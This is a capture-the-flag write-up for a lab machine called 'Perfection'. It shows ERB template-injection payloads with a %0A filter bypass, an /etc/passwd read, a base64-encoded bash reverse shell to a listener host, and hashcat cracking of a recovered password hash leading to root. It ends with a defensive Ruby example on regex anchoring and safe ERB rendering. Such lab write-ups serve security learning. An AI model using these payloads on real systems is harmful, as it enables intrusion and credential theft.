# Perfection

* Nmap scan
* ![image](https://hackmd.io/_uploads/ryxH-LXmT6.png)
* Website
* ![image](https://hackmd.io/_uploads/rkO58mm6p.png)
* There is a weighted grade calculator; I use `burp` to capture the request.
* ![image](https://hackmd.io/_uploads/HyvjdkNTT.png)
* ![image](https://hackmd.io/_uploads/B1Ma_kEaa.png)
* I think it is a `command injection` & `SSTI`. After I saw this, I searched on chatGPT.
* ![image](https://hackmd.io/_uploads/ryzCYkVap.png)
* ![image](https://hackmd.io/_uploads/SJ8g9J4Tp.png)
* Then I got `<%=....%>`; any `ruby` code can be put inside it.
* I tried many command injection bypass symbols from [here](https://0xffsec.com/handbook/web-applications/command-injection/); `%0A` works.
* ![image](https://hackmd.io/_uploads/ByyhqkEpT.png)
* ![image](https://hackmd.io/_uploads/HJ0ej14ap.png)

```ruby
category=a%0A<%25=File.read("/etc/passwd")%25>
```

* So I try to put a reverse shell in and get a connection.

```bash
#!/bin/bash
bash -c "bash -i >& /dev/tcp/10.10.16.12/1337 0>&1"
```

* base64 encode

```bash
IyEvYmluL2Jhc2gKYmFzaCAgLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTYuMTIvMTMzNyAwPiYxIg==
```

* Generate payload

```bash
category1=a%0A<%25%3dsystem("echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjEyLzEzMzcgMD4mMQ== | base64 -d | bash")%25>
nc -lnvp 1337
```

* ![image](https://hackmd.io/_uploads/HJCtlxNaT.png)
* Upgrade shell

```bash
script /dev/null -c /bin/bash
# press CTRL + Z to background the shell
stty raw -echo; fg
# then press Enter twice, and then enter:
export TERM=xterm
```

* userflag: ||`e5176c9da0a1fdb6b89a7e9eca9768a9`||
* ![image](https://hackmd.io/_uploads/r1skGxEpT.png)

## Privilege Escalation

* I found a password hash in `/susan/Migration/pupilpath_credentials.db`
* pupilpath_credentials.db

```bash
strings pupilpath_credentials.db
```

* Susan's password hash: `Susan Millerabeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f`
* I see something in Susan's mail
* ![image](https://hackmd.io/_uploads/rJARYgE6a.png)
* So I use hashcat to crack the hash
* ![image](https://hackmd.io/_uploads/H1maNz4p6.png)
* Susan's password: `susan_nasus_413759210`

```bash
hashcat -m 1400 abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d
```

* ssh
* ![image](https://hackmd.io/_uploads/ryT1HfVap.png)

```bash
sudo su
cat /root/root.txt
```

* ![image](https://hackmd.io/_uploads/Byu_HzVpa.png)
* rootflag: ||`cf491e4abb1c963fadc3a429d9823a5d`||
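* The ERB injection earlier in this writeup got through because a newline (`%0A`) slipped past the input filter. The Ruby below is an added example, not code from the writeup or from the box's application: it assumes the filter was a line-anchored regex (`^...$`, which Ruby matches per line, a common cause of exactly this bypass) and shows the `\A...\z` fix next to a rendering pattern that treats input as data instead of template source.

```ruby
require 'erb'
require 'cgi'

# Assumed for illustration: a validator written with ^ and $, which in Ruby
# anchor to line boundaries. "a\n<%= ... %>" passes because the first line
# alone satisfies the pattern, which is how a %0A bypass gets through.
WEAK_FILTER   = /^[a-z0-9]+$/
# Hardened form: \A and \z anchor to the start and end of the whole string.
STRICT_FILTER = /\A[a-z0-9]+\z/

def passes_weak_filter?(value)
  WEAK_FILTER.match?(value)
end

def passes_strict_filter?(value)
  STRICT_FILTER.match?(value)
end

# Vulnerable pattern: user input is spliced into the template *source*, so
# any <%= %> inside it is evaluated by ERB.
def render_unsafe(category)
  ERB.new("<p>Category: #{category}</p>").result(binding)
end

# Safe pattern: the template is a fixed string, the input reaches it only as
# data, and it is HTML-escaped on output; ERB never parses the input.
def render_safe(category)
  ERB.new("<p>Category: <%= CGI.escapeHTML(category) %></p>").result(binding)
end

if __FILE__ == $PROGRAM_NAME
  injected = "a\n<%= 1 + 1 %>"          # constructed sample input
  puts passes_weak_filter?(injected)    # true: bypassed
  puts passes_strict_filter?(injected)  # false: rejected
  puts render_unsafe(injected)          # the 1 + 1 is evaluated
  puts render_safe(injected)            # rendered as literal text
end
```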